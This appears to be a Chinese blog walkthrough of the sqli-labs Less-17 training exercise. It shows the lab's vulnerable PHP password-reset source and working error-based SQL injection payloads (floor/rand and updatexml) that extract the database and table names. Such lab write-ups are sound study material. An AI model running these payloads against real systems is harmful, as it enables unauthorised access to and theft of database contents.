zoukankan      html  css  js  c++  java

  • sqli-labs less-17

    less-17

    uname=admin' #&passwd=a
    "
    ")
    ')
    都是秘密错误


    试一下永真

    uname=a&passwd=a' or 1=1 #

uname=a&passwd=a" or 1=1 #

uname=a&passwd=a') or 1=1 #

uname=a&passwd=a") or 1=1 #

    也全部报错

    看一下源码

    <?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
    {
    if(!empty($value))
        {
        // truncation (see comments)
        $value = substr($value,0,15);
        }

        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc())
            {
            $value = stripslashes($value);
            }

        // Quote if not a number
        if (!ctype_digit($value))
            {
            $value = "'" . mysql_real_escape_string($value) . "'";
            }
        
    else
        {
        $value = intval($value);
        }
    return $value;
    }

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."
");
fwrite($fp,'New Password:'.$passwd."
");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
    if($row)
    {
          //echo '<font color= "#0000ff">';    
        $row1 = $row['username'];      
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
          echo "<br>";
    
    
    
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;        
            echo "<br>";
            echo "</font>";
        }
    
        echo '<img src="../images/flag1.jpg"   />';    
        //echo 'Your Password:' .$row['password'];
          echo "</font>";
    


      }
    else  
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg"   />';
    
        echo "</font>";  
    }
}

    使用了get_magic_quotes_gpc

    name和password分开验证

    做过头了 ,这个是秘密重置

    我们先看一些check_input()这个函数的内容

    对传入的uname进行了限制 ,只能16个字符

    调用了get_magic_quotes_gpc() 将  '   "  空格 /  进行了转义

    这里没有对passwd进行任何处理

    这里可以用floor()报错注入

    uname=admin&passwd=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #

    还可以用updatexml()进行报错

    1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

    爆表

    uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #
  • 相关阅读:
    Error.prototype (Errors) – JavaScript 中文开发手册
    C 库函数 – isalnum()
    git diff-files (Git) – Git 中文开发手册
    Java面试题:如何在基于Java的Web项目中实现文件上传和下载?
    HTML onload 属性
    JavaScript setDate() 方法
    Linux fsconf命令
    HTML DOM Reset disabled 属性
    wcsstr (Strings) – C 中文开发手册
    HTML area shape 属性
  • 原文地址:https://www.cnblogs.com/xyhacker/p/10049476.html
Copyright © 2011-2022 走看看